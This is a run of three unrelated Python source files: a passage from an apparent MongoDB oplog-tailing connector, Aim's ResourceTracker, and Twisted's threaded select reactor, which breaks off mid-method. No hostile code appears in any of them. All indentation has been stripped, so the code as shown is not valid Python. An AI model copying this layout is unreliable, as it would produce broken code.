"""
def __init__(self, opman, interval):
super(ReplicationLagLogger, self).__init__()
self.opman = opman
self.interval = interval
self.daemon = True
def log_replication_lag(self):
checkpoint = self.opman.checkpoint
if checkpoint is None:
return
newest_write = retry_until_ok(self.opman.get_last_oplog_timestamp)
if newest_write < checkpoint:
# OplogThread will perform a rollback, don't log anything
return
lag_secs = newest_write.time - checkpoint.time
if lag_secs > 0:
LOG.info(
"OplogThread for replica set '%s' is %s seconds behind " "the oplog.",
self.opman.replset_name,
lag_secs,
)
else:
lag_inc = newest_write.inc - checkpoint.inc
if lag_inc > 0:
LOG.info(
"OplogThread for replica set '%s' is %s entries "
"behind the oplog.",
self.opman.replset_name,
lag_inc,
)
else:
LOG.info(
"OplogThread for replica set '%s' is up to date " "with the oplog.",
self.opman.replset_name,
)
def run(self):
while self.opman.is_alive():
self.log_replication_lag()
time.sleep(self.interval)
class OplogThread(threading.Thread):
"""Thread that tails an oplog.
Calls the appropriate method on DocManagers for each relevant oplog entry.
"""
def __init__(
self,
primary_client,
doc_managers,
oplog_progress_dict,
namespace_config,
mongos_client=None,
**kwargs
):
super(OplogThread, self).__init__()
self.batch_size = kwargs.get("batch_size", DEFAULT_BATCH_SIZE)
# The connection to the primary for this replicaSet.
self.primary_client = primary_client
# The connection to the mongos, if there is one.
self.mongos_client = mongos_client
# Are we allowed to perform a collection dump?
self.collection_dump = kwargs.get("collection_dump", True)
# The document manager for each target system.
# These are the same for all threads.
self.doc_managers = doc_managers
# Boolean describing whether or not the thread is running.
self.running = True
# Stores the timestamp of the last oplog entry read.
self.checkpoint = None
# A dictionary that stores OplogThread/timestamp pairs.
# Represents the last checkpoint for a OplogThread.
self.oplog_progress = oplog_progress_dict
# The namespace configuration
self.namespace_config = namespace_config
# Whether the collection dump gracefully handles exceptions
self.continue_on_error = kwargs.get("continue_on_error", False)
LOG.info("OplogThread: Initializing oplog thread")
self.oplog = self.primary_client.local.oplog.rs
self.replset_name = self.primary_client.admin.command("ismaster")["setName"]
if not self.oplog.find_one():
err_msg = "OplogThread: No oplog for thread:"
LOG.warning("%s %s" % (err_msg, self.primary_client))
def _should_skip_entry(self, entry):
"""Determine if this oplog entry should be skipped.
This has the possible side effect of modifying the entry's namespace
and filtering fields from updates and inserts.
"""
# Don't replicate entries resulting from chunk moves
if entry.get("fromMigrate"):
return True, False
# Ignore no-ops
if entry["op"] == "n":
return True, False
ns = entry["ns"]
if "." not in ns:
return True, False
coll = ns.split(".", 1)[1]
# Ignore system collections
if coll.startswith("system."):
return True, False
# Ignore GridFS chunks
if coll.endswith(".chunks"):
return True, False
is_gridfs_file = False
if coll.endswith(".files"):
ns = ns[: -len(".files")]
if self.namespace_config.gridfs_namespace(ns):
is_gridfs_file = True
else:
return True, False
# Commands should not be ignored, filtered, or renamed. Renaming is
# handled by the DocManagers via the CommandHelper class.
if coll == "$cmd":
return False, False
# Rename or filter out namespaces that are ignored keeping
# included gridfs namespaces.
namespace = self.namespace_config.lookup(ns)
if namespace is None:
LOG.debug(
"OplogThread: Skipping oplog entry: "
"'%s' is not in the namespace configuration." % (ns,)
)
return True, False
# Update the namespace.
entry["ns"] = namespace.dest_name
# Take fields out of the oplog entry that shouldn't be replicated.
# This may nullify the document if there's nothing to do.
if not self.filter_oplog_entry(
entry,
include_fields=namespace.include_fields,
exclude_fields=namespace.exclude_fields,
):
return True, False
return False, is_gridfs_file
@log_fatal_exceptions
def run(self):
"""Start the oplog worker.
"""
ReplicationLagLogger(self, 30).start()
LOG.debug("OplogThread: Run thread started")
while self.running is True:
LOG.debug("OplogThread: Getting cursor")
cursor, cursor_empty = retry_until_ok(self.init_cursor)
# we've fallen too far behind
if cursor is None and self.checkpoint is not None:
err_msg = "OplogThread: Last entry no longer in oplog"
effect = "cannot recover!"
LOG.error("%s %s %s" % (err_msg, effect, self.oplog))
self.running = False
continue
if cursor_empty:
LOG.debug(
"OplogThread: Last entry is the one we "
"already processed. Up to date. Sleeping."
)
time.sleep(1)
continue
last_ts = None
remove_inc = 0
upsert_inc = 0
update_inc = 0
try:
LOG.debug("OplogThread: about to process new oplog entries")
while cursor.alive and self.running:
LOG.debug(
"OplogThread: Cursor is still"
" alive and thread is still running."
)
for n, entry in enumerate(cursor):
# Break out if this thread should stop
if not self.running:
break
LOG.debug(
"OplogThread: Iterating through cursor,"
" document number in this cursor is %d" % n
)
skip, is_gridfs_file = self._should_skip_entry(entry)
if skip:
# update the last_ts on skipped entries to ensure
# our checkpoint does not fall off the oplog. This
# also prevents reprocessing skipped entries.
last_ts = entry["ts"]
continue
# Sync the current oplog operation
operation = entry["op"]
ns = entry["ns"]
timestamp = util.bson_ts_to_long(entry["ts"])
for docman in self.doc_managers:
try:
LOG.debug(
"OplogThread: Operation for this "
"entry is %s" % str(operation)
)
# Remove
if operation == "d":
docman.remove(entry["o"]["_id"], ns, timestamp)
remove_inc += 1
# Insert
elif operation == "i": # Insert
# Retrieve inserted document from
# 'o' field in oplog record
doc = entry.get("o")
# Extract timestamp and namespace
if is_gridfs_file:
db, coll = ns.split(".", 1)
gridfile = GridFSFile(
self.primary_client[db][coll], doc
)
docman.insert_file(gridfile, ns, timestamp)
else:
docman.upsert(doc, ns, timestamp)
upsert_inc += 1
# Update
elif operation == "u":
docman.update(
entry["o2"]["_id"], entry["o"], ns, timestamp
)
update_inc += 1
# Command
elif operation == "c":
# use unmapped namespace
doc = entry.get("o")
docman.handle_command(doc, entry["ns"], timestamp)
except errors.OperationFailed:
LOG.exception(
"Unable to process oplog document %r" % entry
)
except errors.ConnectionFailed:
LOG.exception(
"Connection failed while processing oplog "
"document %r" % entry
)
if (remove_inc + upsert_inc + update_inc) % 1000 == 0:
LOG.debug(
"OplogThread: Documents removed: %d, "
"inserted: %d, updated: %d so far"
% (remove_inc, upsert_inc, update_inc)
)
LOG.debug("OplogThread: Doc is processed.")
last_ts = entry["ts"]
# update timestamp per batch size
# n % -1 (default for self.batch_size) == 0 for all n
if n % self.batch_size == 1:
self.update_checkpoint(last_ts)
last_ts = None
# update timestamp after running through oplog
if last_ts is not None:
LOG.debug(
"OplogThread: updating checkpoint after "
"processing new oplog entries"
)
self.update_checkpoint(last_ts)
except (
pymongo.errors.AutoReconnect,
pymongo.errors.OperationFailure,
pymongo.errors.ConfigurationError,
):
LOG.exception(
"Cursor closed due to an exception. " "Will attempt to reconnect."
)
# update timestamp before attempting to reconnect to MongoDB,
# after being join()'ed, or if the cursor closes
if last_ts is not None:
LOG.debug(
"OplogThread: updating checkpoint after an "
"Exception, cursor closing, or join() on this"
"thread."
)
self.update_checkpoint(last_ts)
LOG.debug(
"OplogThread: Sleeping. Documents removed: %d, "
"upserted: %d, updated: %d" % (remove_inc, upsert_inc, update_inc)
)
time.sleep(2)
def join(self):
"""Stop this thread from managing the oplog.
"""
LOG.debug("OplogThread: exiting due to join call.")
self.running = False
threading.Thread.join(self)
@classmethod
def _find_field(cls, field, doc):
"""Find the field in the document which matches the given field.
The field may be in dot notation, eg "a.b.c". Returns a list with
a single tuple (path, field_value) or the empty list if the field
is not present.
"""
path = field.split(".")
try:
for key in path:
doc = doc[key]
return [(path, doc)]
except (KeyError, TypeError):
return []
@classmethod
def _find_update_fields(cls, field, doc):
"""Find the fields in the update document which match the given field.
Both the field and the top level keys in the doc may be in dot
notation, eg "a.b.c". Returns a list of tuples (path, field_value) or
the empty list if the field is not present.
"""
def find_partial_matches():
for key in doc:
if len(key) > len(field):
# Handle case where field is a prefix of key, eg field is
# 'a' and key is 'a.b'.
if key.startswith(field) and key[len(field)] == ".":
yield [key], doc[key]
# Continue searching, there may be multiple matches.
# For example, field 'a' should match 'a.b' and 'a.c'.
elif len(key) < len(field):
# Handle case where key is a prefix of field, eg field is
# 'a.b' and key is 'a'.
if field.startswith(key) and field[len(key)] == ".":
# Search for the remaining part of the field
matched = cls._find_field(field[len(key) + 1 :], doc[key])
if matched:
# Add the top level key to the path.
match = matched[0]
match[0].insert(0, key)
yield match
# Stop searching, it's not possible for any other
# keys in the update doc to match this field.
return
try:
return [([field], doc[field])]
except KeyError:
# Field does not exactly match any key in the update doc.
return list(find_partial_matches())
def _pop_excluded_fields(self, doc, exclude_fields, update=False):
# Remove all the fields that were passed in exclude_fields.
find_fields = self._find_update_fields if update else self._find_field
for field in exclude_fields:
for path, _ in find_fields(field, doc):
# Delete each matching field in the original document.
temp_doc = doc
for p in path[:-1]:
temp_doc = temp_doc[p]
temp_doc.pop(path[-1])
return doc # Need this to be similar to copy_included_fields.
def _copy_included_fields(self, doc, include_fields, update=False):
new_doc = {}
find_fields = self._find_update_fields if update else self._find_field
for field in include_fields:
for path, value in find_fields(field, doc):
# Copy each matching field in the original document.
temp_doc = new_doc
for p in path[:-1]:
temp_doc = temp_doc.setdefault(p, {})
temp_doc[path[-1]] = value
return new_doc
def filter_oplog_entry(self, entry, include_fields=None, exclude_fields=None):
"""Remove fields from an oplog entry that should not be replicated.
NOTE: this does not support array indexing, for example 'a.b.2'"""
if not include_fields and not exclude_fields:
return entry
elif include_fields:
filter_fields = self._copy_included_fields
else:
filter_fields = self._pop_excluded_fields
fields = include_fields or exclude_fields
entry_o = entry["o"]
# Version 3.6 of mongodb includes a $v,
# see https://jira.mongodb.org/browse/SERVER-32240
if "$v" in entry_o:
entry_o.pop("$v")
# 'i' indicates an insert. 'o' field is the doc to be inserted.
if entry["op"] == "i":
entry["o"] = filter_fields(entry_o, fields)
# 'u' indicates an update. The 'o' field describes an update spec
# if '$set' or '$unset' are present.
elif entry["op"] == "u" and ("$set" in entry_o or "$unset" in entry_o):
if "$set" in entry_o:
entry["o"]["$set"] = filter_fields(entry_o["$set"], fields, update=True)
if "$unset" in entry_o:
entry["o"]["$unset"] = filter_fields(
entry_o["$unset"], fields, update=True
)
# not allowed to have empty $set/$unset, so remove if empty
if "$set" in entry_o and not entry_o["$set"]:
entry_o.pop("$set")
if "$unset" in entry_o and not entry_o["$unset"]:
entry_o.pop("$unset")
if not entry_o:
return None
# 'u' indicates an update. The 'o' field is the replacement document
# if no '$set' or '$unset' are present.
elif entry["op"] == "u":
entry["o"] = filter_fields(entry_o, fields)
return entry
def get_oplog_cursor(self, timestamp=None):
"""Get a cursor to the oplog after the given timestamp, excluding
no-op entries.
If no timestamp is specified, returns a cursor to the entire oplog.
"""
query = {"op": {"$ne": "n"}}
if timestamp is None:
cursor = self.oplog.find(query, cursor_type=CursorType.TAILABLE_AWAIT)
else:
query["ts"] = {"$gte": timestamp}
cursor = self.oplog.find(
query, cursor_type=CursorType.TAILABLE_AWAIT, oplog_replay=True
)
return cursor
def get_collection(self, namespace):
"""Get a pymongo collection from a namespace."""
database, coll = namespace.split(".", 1)
return self.primary_client[database][coll]
def dump_collection(self):
"""Dumps collection into the target system.
This method is called when we're initializing the cursor and have no
configs i.e. when we're starting for the first time.
"""
timestamp = retry_until_ok(self.get_last_oplog_timestamp)
if timestamp is None:
return None
long_ts = util.bson_ts_to_long(timestamp)
# Flag if this oplog thread was cancelled during the collection dump.
# Use a list to workaround python scoping.
dump_cancelled = [False]
def get_all_ns():
ns_set = []
gridfs_ns_set = []
db_list = self.namespace_config.get_included_databases()
if not db_list:
# Only use listDatabases when the configured databases are not
# explicit.
db_list = retry_until_ok(self.primary_client.database_names)
for database in db_list:
if database == "config" or database == "local":
continue
coll_list = retry_until_ok(
self.primary_client[database].collection_names
)
for coll in coll_list:
# ignore system collections
if coll.startswith("system."):
continue
# ignore gridfs chunks collections
if coll.endswith(".chunks"):
continue
if coll.endswith(".files"):
namespace = "%s.%s" % (database, coll)
namespace = namespace[: -len(".files")]
if self.namespace_config.gridfs_namespace(namespace):
gridfs_ns_set.append(namespace)
else:
namespace = "%s.%s" % (database, coll)
if self.namespace_config.map_namespace(namespace):
ns_set.append(namespace)
return ns_set, gridfs_ns_set
dump_set, gridfs_dump_set = get_all_ns()
LOG.debug("OplogThread: Dumping set of collections %s " % dump_set)
def docs_to_dump(from_coll):
last_id = None
attempts = 0
projection = self.namespace_config.projection(from_coll.full_name)
# Loop to handle possible AutoReconnect
while attempts < 60:
if last_id is None:
cursor = retry_until_ok(
from_coll.find,
projection=projection,
sort=[("_id", pymongo.ASCENDING)],
)
else:
cursor = retry_until_ok(
from_coll.find,
{"_id": {"$gt": last_id}},
projection=projection,
sort=[("_id", pymongo.ASCENDING)],
)
try:
for doc in cursor:
if not self.running:
# Thread was joined while performing the
# collection dump.
dump_cancelled[0] = True
raise StopIteration
last_id = doc["_id"]
yield doc
break
except (pymongo.errors.AutoReconnect, pymongo.errors.OperationFailure):
attempts += 1
time.sleep(1)
def upsert_each(dm):
num_failed = 0
for namespace in dump_set:
from_coll = self.get_collection(namespace)
mapped_ns = self.namespace_config.map_namespace(namespace)
total_docs = retry_until_ok(from_coll.count)
num = None
for num, doc in enumerate(docs_to_dump(from_coll)):
try:
dm.upsert(doc, mapped_ns, long_ts)
except Exception:
if self.continue_on_error:
LOG.exception("Could not upsert document: %r" % doc)
num_failed += 1
else:
raise
if num % 10000 == 0:
LOG.info(
"Upserted %d out of approximately %d docs "
"from collection '%s'",
num + 1,
total_docs,
namespace,
)
if num is not None:
LOG.info(
"Upserted %d out of approximately %d docs from "
"collection '%s'",
num + 1,
total_docs,
namespace,
)
if num_failed > 0:
LOG.error("Failed to upsert %d docs" % num_failed)
def upsert_all(dm):
try:
for namespace in dump_set:
from_coll = self.get_collection(namespace)
total_docs = retry_until_ok(from_coll.count)
mapped_ns = self.namespace_config.map_namespace(namespace)
LOG.info(
"Bulk upserting approximately %d docs from " "collection '%s'",
total_docs,
namespace,
)
dm.bulk_upsert(docs_to_dump(from_coll), mapped_ns, long_ts)
except Exception:
if self.continue_on_error:
LOG.exception(
"OplogThread: caught exception"
" during bulk upsert, re-upserting"
" documents serially"
)
upsert_each(dm)
else:
raise
def do_dump(dm, error_queue):
try:
LOG.debug(
"OplogThread: Using bulk upsert function for " "collection dump"
)
upsert_all(dm)
if gridfs_dump_set:
LOG.info(
"OplogThread: dumping GridFS collections: %s", gridfs_dump_set
)
# Dump GridFS files
for gridfs_ns in gridfs_dump_set:
mongo_coll = self.get_collection(gridfs_ns)
from_coll = self.get_collection(gridfs_ns + ".files")
dest_ns = self.namespace_config.map_namespace(gridfs_ns)
for doc in docs_to_dump(from_coll):
gridfile = GridFSFile(mongo_coll, doc)
dm.insert_file(gridfile, dest_ns, long_ts)
except Exception:
# Likely exceptions:
# pymongo.errors.OperationFailure,
# mongo_connector.errors.ConnectionFailed
# mongo_connector.errors.OperationFailed
error_queue.put(sys.exc_info())
# Extra threads (if any) that assist with collection dumps
dumping_threads = []
# Did the dump succeed for all target systems?
dump_success = True
# Holds any exceptions we can't recover from
errors = queue.Queue()
if len(self.doc_managers) == 1:
do_dump(self.doc_managers[0], errors)
else:
# Slight performance gain breaking dump into separate
# threads if > 1 replication target
for dm in self.doc_managers:
t = threading.Thread(target=do_dump, args=(dm, errors))
dumping_threads.append(t)
t.start()
# cleanup
for t in dumping_threads:
t.join()
# Print caught exceptions
try:
while True:
LOG.critical(
"Exception during collection dump", exc_info=errors.get_nowait()
)
dump_success = False
except queue.Empty:
pass
if not dump_success:
err_msg = "OplogThread: Failed during dump collection"
effect = "cannot recover!"
LOG.error("%s %s %s" % (err_msg, effect, self.oplog))
self.running = False
return None
if dump_cancelled[0]:
LOG.warning(
"Initial collection dump was interrupted. "
"Will re-run the collection dump on next startup."
)
return None
return timestamp
def _get_oplog_timestamp(self, newest_entry):
"""Return the timestamp of the latest or earliest entry in the oplog.
"""
sort_order = pymongo.DESCENDING if newest_entry else pymongo.ASCENDING
curr = (
self.oplog.find({"op": {"$ne": "n"}}).sort("$natural", sort_order).limit(-1)
)
try:
ts = next(curr)["ts"]
except StopIteration:
LOG.debug("OplogThread: oplog is empty.")
return None
LOG.debug(
"OplogThread: %s oplog entry has timestamp %s."
% ("Newest" if newest_entry else "Oldest", ts)
)
return ts
def get_oldest_oplog_timestamp(self):
"""Return the timestamp of the oldest entry in the oplog.
"""
return self._get_oplog_timestamp(False)
def get_last_oplog_timestamp(self):
"""Return the timestamp of the newest entry in the oplog.
"""
return self._get_oplog_timestamp(True)
def _cursor_empty(self, cursor):
try:
# Tailable cursors can not have singleBatch=True in MongoDB > 3.3
next(cursor.clone().remove_option(CursorType.TAILABLE_AWAIT).limit(-1))
return False
except StopIteration:
return True
def init_cursor(self):
"""Position the cursor appropriately.
The cursor is set to either the beginning of the oplog, or
wherever it was last left off.
Returns the cursor and True if the cursor is empty.
"""
timestamp = self.read_last_checkpoint()
if timestamp is None:
if self.collection_dump:
# dump collection and update checkpoint
timestamp = self.dump_collection()
self.update_checkpoint(timestamp)
if timestamp is None:
return None, True
else:
# Collection dump disabled:
# Return cursor to beginning of oplog but do not set the
# checkpoint. The checkpoint will be set after an operation
# has been applied.
cursor = self.get_oplog_cursor()
return cursor, self._cursor_empty(cursor)
cursor = self.get_oplog_cursor(timestamp)
cursor_empty = self._cursor_empty(cursor)
if cursor_empty:
# rollback, update checkpoint, and retry
LOG.debug("OplogThread: Initiating rollback from " "get_oplog_cursor")
self.update_checkpoint(self.rollback())
return self.init_cursor()
first_oplog_entry = next(cursor)
oldest_ts_long = util.bson_ts_to_long(self.get_oldest_oplog_timestamp())
checkpoint_ts_long = util.bson_ts_to_long(timestamp)
if checkpoint_ts_long < oldest_ts_long:
# We've fallen behind, the checkpoint has fallen off the oplog
return None, True
cursor_ts_long = util.bson_ts_to_long(first_oplog_entry["ts"])
if cursor_ts_long > checkpoint_ts_long:
# The checkpoint is not present in this oplog and the oplog
# did not rollover. This means that we connected to a new
# primary which did not replicate the checkpoint and which has
# new changes in its oplog for us to process.
# rollback, update checkpoint, and retry
LOG.debug(
"OplogThread: Initiating rollback from "
"get_oplog_cursor: new oplog entries found but "
"checkpoint is not present"
)
self.update_checkpoint(self.rollback())
return self.init_cursor()
# first entry has been consumed
return cursor, cursor_empty
def update_checkpoint(self, checkpoint):
"""Store the current checkpoint in the oplog progress dictionary.
"""
if checkpoint is not None and checkpoint != self.checkpoint:
self.checkpoint = checkpoint
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
# If we have the repr of our oplog collection
# in the dictionary, remove it and replace it
# with our replica set name.
# This allows an easy upgrade path from mongo-connector 2.3.
# For an explanation of the format change, see the comment in
# read_last_checkpoint.
oplog_dict.pop(str(self.oplog), None)
oplog_dict[self.replset_name] = checkpoint
LOG.debug("OplogThread: oplog checkpoint updated to %s", checkpoint)
else:
LOG.debug("OplogThread: no checkpoint to update.")
def read_last_checkpoint(self):
"""Read the last checkpoint from the oplog progress dictionary.
"""
# In versions of mongo-connector 2.3 and before,
# we used the repr of the
# oplog collection as keys in the oplog_progress dictionary.
# In versions thereafter, we use the replica set name. For backwards
# compatibility, we check for both.
oplog_str = str(self.oplog)
ret_val = None
with self.oplog_progress as oplog_prog:
oplog_dict = oplog_prog.get_dict()
try:
# New format.
ret_val = oplog_dict[self.replset_name]
except KeyError:
try:
# Old format.
ret_val = oplog_dict[oplog_str]
except KeyError:
pass
LOG.debug("OplogThread: reading last checkpoint as %s " % str(ret_val))
self.checkpoint = ret_val
return ret_val
def rollback(self):
"""Rollback target system to consistent state.
The strategy is to find the latest timestamp in the target system and
the largest timestamp in the oplog less than the latest target system
timestamp. This defines the rollback window and we just roll these
back until the oplog and target system are in consistent states.
"""
# Find the most recently inserted document in each target system
LOG.debug(
"OplogThread: Initiating rollback sequence to bring "
"system into a consistent state."
)
last_docs = []
for dm in self.doc_managers:
dm.commit()
last_docs.append(dm.get_last_doc())
# Of these documents, which is the most recent?
last_inserted_doc = max(
last_docs, key=lambda x: x["_ts"] if x else float("-inf")
)
# Nothing has been replicated. No need to rollback target systems
if last_inserted_doc is None:
return None
# Find the oplog entry that touched the most recent document.
# We'll use this to figure where to pick up the oplog later.
target_ts = util.long_to_bson_ts(last_inserted_doc["_ts"])
last_oplog_entry = util.retry_until_ok(
self.oplog.find_one,
{"ts": {"$lte": target_ts}, "op": {"$ne": "n"}},
sort=[("$natural", pymongo.DESCENDING)],
)
LOG.debug("OplogThread: last oplog entry is %s" % str(last_oplog_entry))
# The oplog entry for the most recent document doesn't exist anymore.
# If we've fallen behind in the oplog, this will be caught later
if last_oplog_entry is None:
return None
# rollback_cutoff_ts happened *before* the rollback
rollback_cutoff_ts = last_oplog_entry["ts"]
start_ts = util.bson_ts_to_long(rollback_cutoff_ts)
# timestamp of the most recent document on any target system
end_ts = last_inserted_doc["_ts"]
for dm in self.doc_managers:
rollback_set = {} # this is a dictionary of ns:list of docs
# group potentially conflicted documents by namespace
for doc in dm.search(start_ts, end_ts):
if doc["ns"] in rollback_set:
rollback_set[doc["ns"]].append(doc)
else:
rollback_set[doc["ns"]] = [doc]
# retrieve these documents from MongoDB, either updating
# or removing them in each target system
for namespace, doc_list in rollback_set.items():
# Get the original namespace
original_namespace = self.namespace_config.unmap_namespace(namespace)
if not original_namespace:
original_namespace = namespace
database, coll = original_namespace.split(".", 1)
obj_id = bson.objectid.ObjectId
bson_obj_id_list = [obj_id(doc["_id"]) for doc in doc_list]
# Use connection to whole cluster if in sharded environment.
client = self.mongos_client or self.primary_client
to_update = util.retry_until_ok(
client[database][coll].find,
{"_id": {"$in": bson_obj_id_list}},
projection=self.namespace_config.projection(original_namespace),
)
# Doc list are docs in target system, to_update are
# Docs in mongo
doc_hash = {} # Hash by _id
for doc in doc_list:
doc_hash[bson.objectid.ObjectId(doc["_id"])] = doc
to_index = []
def collect_existing_docs():
for doc in to_update:
if doc["_id"] in doc_hash:
del doc_hash[doc["_id"]]
to_index.append(doc)
retry_until_ok(collect_existing_docs)
# Delete the inconsistent documents
LOG.debug("OplogThread: Rollback, removing inconsistent " "docs.")
remov_inc = 0
for document_id in doc_hash:
try:
dm.remove(
document_id,
namespace,
util.bson_ts_to_long(rollback_cutoff_ts),
)
remov_inc += 1
LOG.debug("OplogThread: Rollback, removed %r " % doc)
except errors.OperationFailed:
LOG.warning(
"Could not delete document during rollback: %r "
"This can happen if this document was already "
"removed by another rollback happening at the "
"same time." % doc
)
LOG.debug("OplogThread: Rollback, removed %d docs." % remov_inc)
# Insert the ones from mongo
LOG.debug("OplogThread: Rollback, inserting documents " "from mongo.")
insert_inc = 0
fail_insert_inc = 0
for doc in to_index:
try:
insert_inc += 1
dm.upsert(
doc, namespace, util.bson_ts_to_long(rollback_cutoff_ts)
)
except errors.OperationFailed:
fail_insert_inc += 1
LOG.exception(
"OplogThread: Rollback, Unable to " "insert %r" % doc
)
LOG.debug(
"OplogThread: Rollback, Successfully inserted %d "
" documents and failed to insert %d"
" documents. Returning a rollback cutoff time of %s "
% (insert_inc, fail_insert_inc, str(rollback_cutoff_ts))
)
return rollback_cutoff_ts
|
tracker.py
|
from psutil import Process, cpu_percent
from threading import Thread
import time
import weakref
from typing import Union
from aim.ext.resource.stat import Stat
from aim.ext.resource.configs import AIM_RESOURCE_METRIC_PREFIX
class ResourceTracker(object):
STAT_INTERVAL_MIN = 0.1
STAT_INTERVAL_MAX = 24 * 60 * 60.0
STAT_INTERVAL_DEFAULT = 60.0
reset_cpu_cycle = False
@staticmethod
def reset_proc_interval():
"""
Calls process `cpu_percent` which resets cpu utilization tracking cycle
Read more: https://psutil.readthedocs.io/en/latest/#psutil.cpu_percent
"""
cpu_percent(0.0)
def __init__(self, track, interval: Union[int, float] = STAT_INTERVAL_DEFAULT):
self._track_func = weakref.WeakMethod(track)
self.interval = interval
try:
self._process = Process()
except Exception:
self._process = None
# Start thread to collect stats at interval
self._th_collector = Thread(target=self._stat_collector, daemon=True)
self._shutdown = False
self._started = False
if ResourceTracker.reset_cpu_cycle is False:
ResourceTracker.reset_cpu_cycle = True
self.reset_proc_interval()
@property
def interval(self):
return self._interval
@interval.setter
def interval(self, interval: float):
if self.STAT_INTERVAL_MIN <= interval <= self.STAT_INTERVAL_MAX:
self._interval = interval
else:
raise ValueError(('interval must be greater than {min}s and less '
'than {max}m'
'').format(min=self.STAT_INTERVAL_MIN,
max=self.STAT_INTERVAL_MAX / 60))
def start(self):
"""
Start statistics collection
"""
if self._started:
return
self._started = True
# Start thread to asynchronously collect statistics
self._th_collector.start()
def stop(self):
if not self._started:
return
self._shutdown = True
self._th_collector.join()
def _track(self, stat: Stat):
# Store system stats
for resource, usage in stat.system.items():
self._track_func()(
usage,
name='{}{}'.format(AIM_RESOURCE_METRIC_PREFIX, resource),
)
# Store GPU stats
for gpu_idx, gpu in enumerate(stat.gpus):
for resource, usage in gpu.items():
self._track_func()(
usage,
name='{}{}'.format(AIM_RESOURCE_METRIC_PREFIX, resource),
context={'gpu': gpu_idx}
)
def _stat_collector(self):
"""
Statistics collecting thread body
"""
while True:
# Get system statistics
stat = Stat(self._process)
if self._shutdown:
break
self._track(stat)
time_counter = 0
while time_counter < self.interval:
time.sleep(0.1)
time_counter += 0.1
if self._shutdown:
break
|
_threadedselect.py
|
# -*- test-case-name: twisted.test.test_internet -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Threaded select reactor
The threadedselectreactor is a specialized reactor for integrating with
arbitrary foreign event loop, such as those you find in GUI toolkits.
There are three things you'll need to do to use this reactor.
Install the reactor at the beginning of your program, before importing
the rest of Twisted::
| from twisted.internet import _threadedselect
| _threadedselect.install()
Interleave this reactor with your foreign event loop, at some point after
your event loop is initialized::
| from twisted.internet import reactor
| reactor.interleave(foreignEventLoopWakerFunction)
| self.addSystemEventTrigger('after', 'shutdown', foreignEventLoopStop)
Instead of shutting down the foreign event loop directly, shut down the
reactor::
| from twisted.internet import reactor
| reactor.stop()
In order for Twisted to do its work in the main thread (the thread that
interleave is called from), a waker function is necessary. The waker function
will be called from a "background" thread with one argument: func.
The waker function's purpose is to call func() from the main thread.
Many GUI toolkits ship with appropriate waker functions.
Some examples of this are wxPython's wx.callAfter (may be wxCallAfter in
older versions of wxPython) or PyObjC's PyObjCTools.AppHelper.callAfter.
These would be used in place of "foreignEventLoopWakerFunction" in the above
example.
The other integration point at which the foreign event loop and this reactor
must integrate is shutdown. In order to ensure clean shutdown of Twisted,
you must allow for Twisted to come to a complete stop before quitting the
application. Typically, you will do this by setting up an after shutdown
trigger to stop your foreign event loop, and call reactor.stop() where you
would normally have initiated the shutdown procedure for the foreign event
loop. Shutdown functions that could be used in place of
"foreignEventloopStop" would be the ExitMainLoop method of the wxApp instance
with wxPython, or the PyObjCTools.AppHelper.stopEventLoop function.
"""
from functools import partial
from threading import Thread
from queue import Queue, Empty
import sys
from zope.interface import implementer
from twisted.internet.interfaces import IReactorFDSet
from twisted.internet import posixbase
from twisted.internet.posixbase import _NO_FILENO, _NO_FILEDESC
from twisted.python import log, failure, threadable
import select
from errno import EINTR, EBADF
from twisted.internet.selectreactor import _select
def dictRemove(dct, value):
try:
del dct[value]
except KeyError:
pass
def raiseException(e):
raise e
@implementer(IReactorFDSet)
class ThreadedSelectReactor(posixbase.PosixReactorBase):
"""A threaded select() based reactor - runs on all POSIX platforms and on
Win32.
"""
def __init__(self):
threadable.init(1)
self.reads = {}
self.writes = {}
self.toThreadQueue = Queue()
self.toMainThread = Queue()
self.workerThread = None
self.mainWaker = None
posixbase.PosixReactorBase.__init__(self)
self.addSystemEventTrigger('after', 'shutdown', self._mainLoopShutdown)
def wakeUp(self):
# we want to wake up from any thread
self.waker.wakeUp()
def callLater(self, *args, **kw):
tple = posixbase.PosixReactorBase.callLater(self, *args, **kw)
self.wakeUp()
return tple
def _sendToMain(self, msg, *args):
self.toMainThread.put((msg, args))
if self.mainWaker is not None:
self.mainWaker()
def _sendToThread(self, fn, *args):
self.toThreadQueue.put((fn, args))
def _preenDescriptorsInThread(self):
log.msg("Malformed file descriptor found. Preening lists.")
readers = self.reads.keys()
writers = self.writes.keys()
self.reads.clear()
self.writes.clear()
for selDict, selList in ((self.reads, readers), (self.writes, writers)):
for selectable in selList:
try:
select.select([selectable], [selectable], [selectable], 0)
except:
log.msg("bad descriptor %s" % selectable)
else:
selDict[selectable] = 1
def _workerInThread(self):
try:
while 1:
fn, args = self.toThreadQueue.get()
fn(*args)
except SystemExit:
pass # Exception indicates this thread should exit
except:
f = failure.Failure()
self._sendToMain('Failure', f)
def _doSelectInThread(self, timeout):
"""Run one iteration of the I/O monitor loop.
This will run all selectables who had input or output readiness
waiting for them.
"""
reads = self.reads
writes = self.writes
while 1:
try:
r, w, ignored = _select(reads.keys(),
writes.keys(),
[], timeout)
break
except ValueError:
# Possibly a file descriptor has gone negative?
log.err()
self._preenDescriptorsInThread()
except TypeError:
# Something *totally* invalid (object w/o fileno, non-integral
# result) was passed
log.err()
self._preenDescriptorsInThread()
except (select.error, IOError) as se:
# select(2) encountered an error
if se.args[0] in (0, 2):
# windows does this if it got an empty list
if (not reads) and (not writes):
return
else:
raise
elif se.args[0] == EINTR:
return
elif se.args[0] == EBADF:
self._preenDescriptorsInThread()
else:
# OK, I really don't know what's going on. Blow up.
raise
self._sendToMain('Notify', r, w)
def _process_Notify(self, r, w):
reads = self.reads
writes = self.writes
_drdw = self._doReadOrWrite
_logrun = log.callWithLogger
for selectables, method, dct in (
(r, "doRead", reads), (w, "doWrite", writes)):
for selectable in selectables:
# if this was disconnected in another thread, kill it.
if selectable not in dct:
continue
# This for pausing input when we're not ready for more.
_logrun(selectable, _drdw, selectable, method, dct)
def _process_Failure(self, f):
f.raiseException()
_doIterationInThread = _doSelectInThread
def ensureWorkerThread(self):
if self.workerThread is None or not self.workerThread.isAlive():
self.workerThread = Thread(target=self._workerInThread)
self.workerThread.start()
def doThreadIteration(self, timeout):
self._sendToThread(self._doIterationInThread, timeout)
self.ensureWorkerThread()
msg, args = self.toMainThread.get()
